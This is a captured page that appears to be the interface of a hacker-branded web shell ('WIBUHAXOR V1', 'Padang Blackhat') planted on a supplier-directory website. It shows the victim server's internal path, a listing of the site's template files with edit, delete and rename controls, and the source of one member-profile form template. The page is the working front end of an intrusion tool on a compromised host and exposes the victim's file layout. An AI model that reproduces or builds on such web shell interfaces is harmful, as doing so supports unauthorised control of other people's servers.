-
WIBUHAX0R1337
-
/
home
/
zqegovsj
/
public_html
/
us3.supplierlist.com
/
haibo
/
en
/
templates
/
newmember
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
comment_index.html
2.341KB
Edit File
Delete File
Rename
company.html
5.063KB
Edit File
Delete File
Rename
company_branner.html
1.439KB
Edit File
Delete File
Rename
contact.html
10.84KB
Edit File
Delete File
Rename
contact_branner.html
1.419KB
Edit File
Delete File
Rename
creat_excel.html
0.594KB
Edit File
Delete File
Rename
download_edit.html
2.483KB
Edit File
Delete File
Rename
download_index.html
2.623KB
Edit File
Delete File
Rename
feedback_branner.html
1.458KB
Edit File
Delete File
Rename
flash_edit.html
3.023KB
Edit File
Delete File
Rename
flash_img.html
2.688KB
Edit File
Delete File
Rename
flash_list.html
2.586KB
Edit File
Delete File
Rename
foot.html
2.377KB
Edit File
Delete File
Rename
freemember1.html
8.989KB
Edit File
Delete File
Rename
freemember2.html
11.075KB
Edit File
Delete File
Rename
freemember3.html
1.998KB
Edit File
Delete File
Rename
freemember4.html
14.484KB
Edit File
Delete File
Rename
head.html
11.417KB
Edit File
Delete File
Rename
head_bak.html
11.265KB
Edit File
Delete File
Rename
home.html
6.464KB
Edit File
Delete File
Rename
img.html
2.117KB
Edit File
Delete File
Rename
img2.html
2.565KB
Edit File
Delete File
Rename
img_list.html
3.405KB
Edit File
Delete File
Rename
index.html
0.927KB
Edit File
Delete File
Rename
index2.html
8.044KB
Edit File
Delete File
Rename
member_edit.html
10.083KB
Edit File
Delete File
Rename
member_index.html
3.014KB
Edit File
Delete File
Rename
member_upload.html
2.5KB
Edit File
Delete File
Rename
memberversion.html
17.646KB
Edit File
Delete File
Rename
menu.html
2.48KB
Edit File
Delete File
Rename
mycart_index.html
5.934KB
Edit File
Delete File
Rename
mysku_index.html
3.946KB
Edit File
Delete File
Rename
new_branner.html
1.593KB
Edit File
Delete File
Rename
news.html
2.778KB
Edit File
Delete File
Rename
news_edit.html
7.619KB
Edit File
Delete File
Rename
newstype_edit.html
2.915KB
Edit File
Delete File
Rename
newstype_index.html
2.097KB
Edit File
Delete File
Rename
password.html
2.251KB
Edit File
Delete File
Rename
personal.html
3.997KB
Edit File
Delete File
Rename
photo.html
1.059KB
Edit File
Delete File
Rename
photo_add.html
1.748KB
Edit File
Delete File
Rename
product_branner.html
1.613KB
Edit File
Delete File
Rename
product_edit.html
27.4KB
Edit File
Delete File
Rename
product_list.html
10.698KB
Edit File
Delete File
Rename
product_type.html
4.825KB
Edit File
Delete File
Rename
product_type_action.html
7.422KB
Edit File
Delete File
Rename
qty.html
2.855KB
Edit File
Delete File
Rename
qty2.html
3.557KB
Edit File
Delete File
Rename
qty_list.html
3.729KB
Edit File
Delete File
Rename
section_edit.html
9.508KB
Edit File
Delete File
Rename
section_list.html
2.281KB
Edit File
Delete File
Rename
sectioncontent_edit.html
8.749KB
Edit File
Delete File
Rename
sectioncontent_index.html
2.817KB
Edit File
Delete File
Rename
service_edit.html
2.556KB
Edit File
Delete File
Rename
service_index.html
2.964KB
Edit File
Delete File
Rename
status.html
2.472KB
Edit File
Delete File
Rename
tip.html
1.129KB
Edit File
Delete File
Rename
update_ok.html
1.114KB
Edit File
Delete File
Rename
user_edit.html
2.771KB
Edit File
Delete File
Rename
user_index.html
4.045KB
Edit File
Delete File
Rename
<{config_load file="ua.conf" section="room"}> <meta http-equiv="Content-Type" content="text/html; charset=<{#Charset#}>"> <link href="<{$CSS_PATH}>css/style.css" rel="stylesheet" type="text/css"> <link href="<{$INC_PATH}>css/room.css" rel="stylesheet" type="text/css"> <script language="javascript" src="<{$JS_PATH}>js/general.js"></script> <script src="<{$JS_PATH}>js/prototype.js"></script> <script src="<{$JS_PATH}>js/mixselect.js"></script> <script language="javascript"> function IsURL(urlString) { regExp = /(?:(?:http[s]?|ftp):\/\/)?[^\/\.]+?\.[^\.\\\/]+?\.\w{2,}$/i; if (urlString.match(regExp))return true; else return false; } function checkinput(){ if($F('memberlastname')==""){ alert("请输入您的Name"); $('memberlastname').focus(); return false; } if($F('membersite_url')!=""){ if(!IsURL($F('membersite_url'))){ alert("您输入的网址有误"); $('membersite_url').focus(); return false; } } return true; } </script> <table width="100%" border="0" cellspacing="0" cellpadding="10"> <tr bgcolor="#FFFFFF"> <td> <form name="companyeditfrm" action="./personal.php" method="post"> <table width="100%" border="0" cellpadding="2" cellspacing="1" bgcolor="#D3E2E7"> <tr bgcolor="#D3E2E7"> <td colspan="2" class="link-black">用户基本信息</td> </tr> <tr bgcolor="#FFFFFF"> <td >用户名:</td> <td ><{$p.MemberUsername}> <a href="password.php">修改密码</a></td> </tr> <tr bgcolor="#FFFFFF"> <td >姓名:</td> <td ><input name="member[lastname]" type="text" id="memberlastname" value="<{$p.MemberLastname}>"><font color="#FF6600">*</font></td> </tr> <tr bgcolor="#FFFFFF"> <td >性别:</td> <td ><{html_radios name="member[gender]" options=$Genders checked=$p.MemberGender|default:"1" separator=" "}></td> </tr> <tr bgcolor="#FFFFFF"> <td >QQ:</td> <td ><input name="member[qq]" type="text" id="memberqq" value="<{$p.MemberQq}>"></td> </tr> <tr bgcolor="#FFFFFF"> <td ><p>Msn:</p> </td> <td ><input name="member[msn]" type="text" id="membermsn" value="<{$p.MemberMsn}>"></td> </tr> <tr bgcolor="#FFFFFF"> <td >Yahoo: </td> <td ><input name="member[yahoo]" type="text" id="memberyahoo" value="<{$p.MemberYahoo}>"></td> </tr> <tr bgcolor="#FFFFFF"> <td >手机:</td> <td ><input name="member[mobile]" type="text" id="membermobile" value="<{$p.MemberMobile}>"></td> </tr> <tr bgcolor="#FFFFFF"> <td >邮箱:</td> <td ><input name="member[email]" type="text" id="memberemail" value="<{$p.MemberEmail}>" size="32" disabled> (<a name="mod" href="#mod" onclick="javascript:$('memberemail').disabled=false;">修改</a>)</td></tr> <tr bgcolor="#FFFFFF"><td></td> <td height="40" ><br> <input name="save" type="submit" id="save" onClick="return checkinput();" value="保存"> </td> </tr> </table> </form> </td> </tr> </table> <script language="javascript"> var linkage2 = new Linkage("dataSrc2", "<{$JS_PATH}>media/xml/area.xml"); linkage2.BLANK_SELECT = "Please select "; linkage2.init(); </script> <{include file="newmember/foot.html"}>
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat